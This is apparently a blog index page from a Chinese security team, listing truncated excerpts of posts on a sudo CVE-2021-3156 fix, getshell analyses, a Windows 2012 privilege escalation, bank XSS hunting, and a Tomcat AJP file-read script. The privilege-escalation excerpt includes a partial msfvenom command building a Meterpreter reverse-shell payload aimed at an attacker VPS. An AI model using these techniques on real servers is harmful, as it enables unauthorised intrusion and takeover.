14x Security Team

展开菜单

CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)

CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)
CentOS升级sudo版本,解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)漏洞介绍关于 Sudo 堆缓冲区溢出漏洞(CVE-2021- 3156)的预警通知有关情报显示,sudo 存在缓冲区溢出漏洞。攻击者在取得服 务器基础权限的情况下,可以利用 sudo 基于堆的缓冲区溢出漏 洞,获得 root 权限。在 sudo 解析命令行参数的方式中发现了基 于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudo er 和非 sudoer...

记一次靶机漏洞的getshell逻辑代码分析过程

记一次靶机漏洞的getshell逻辑代码分析过程
记一次靶机漏洞的getshell逻辑代码分析过程首先是parmas变量类型函数,指向useraccount,实际上看到JcResetPass_checkSafeInfo.action是用来校验的地址那么实际上,我们只需要看这里,初始化变量type,如果data的结果为空,var _processing = false; var type = "0"; var submitType;  function change(type){  if...

记一次ms16075邪恶土豆提权windows2012服务器过程

记一次ms16075邪恶土豆提权windows2012服务器过程
记一次ms16075邪恶土豆提权windows2012服务器过程匿名权限2012服务器服务器系统是window2012的需要准备一台vps公网服务器,和一台kali虚拟机进行映射通信kali设置frp代理规则server填写公网服务器IP然后在在VPS启动frpKali转发6666到公网的1234端口配合MSF进行反弹开启kali的frp由MSF生成木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=6...

old Team getshell上传工具

old Team getshell上传工具
old Team getshell上传工具,实现单个上传exp,和自动上传post功能漏洞由old Team发现的通用getshell漏洞,为了方便,写个工具测试...

区块链技术的八大核心功能介绍

区块链技术的八大核心功能介绍
区块链技术的八大核心功能介绍 1、去中心化去中心化(Decentralization)是区块链最根本的性质,也是区块链区别于其他分布式账本的最重要因素,尽管这一点还存有争议。去中心化通常与中心化(CentralizaTIon)、分布式(Distributed)进行比较。以太坊创始人Vitalik Buterin在《去中心化的真正含义》一文中详细阐述了去中心化的概念,从网络架构、治理体制、逻辑结构三个维度进行了分析,指出区块链在网络架构和治理体制上是去中心化的,没有人...

好久没写文章了,分享一个银行XSS漏洞挖掘技巧过程

好久没写文章了,分享一个银行XSS漏洞挖掘技巧过程
好久没写文章了,分享一个银行XSS漏洞挖掘技巧过程PS:明年可能去XX或者XX深造深造众所周知,银行的业务系统,是很安全的,不管是接口还是其他的服务,都相对比较成熟,很难挖到有价值的漏洞今天有空写篇文章,简单分享一个银行XSS漏洞,逻辑漏洞技巧挖掘过程以前也挖过银行类的漏洞,都是有保密协议的首先我们得到的目标是一个微信公众号,在这里我们可以随便点开一个页面,获得连接,这时候我们需要发包工具进行测试推荐:fidder,很方便抓到一个地址发现是一个POST方法,token接口,意...

CNVD-2020-10487-Tomcat-Ajp-lfi.py

CNVD-2020-10487-Tomcat-Ajp-lfi.py
CNVD-2020-10487-Tomcat-Ajp-lfi.py#!/usr/bin/env python#CNVD-2020-10487  Tomcat-Ajp lfi#by ydhcuiimport struct# Some references:# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.htmldef pack_string(s):    if s is Non...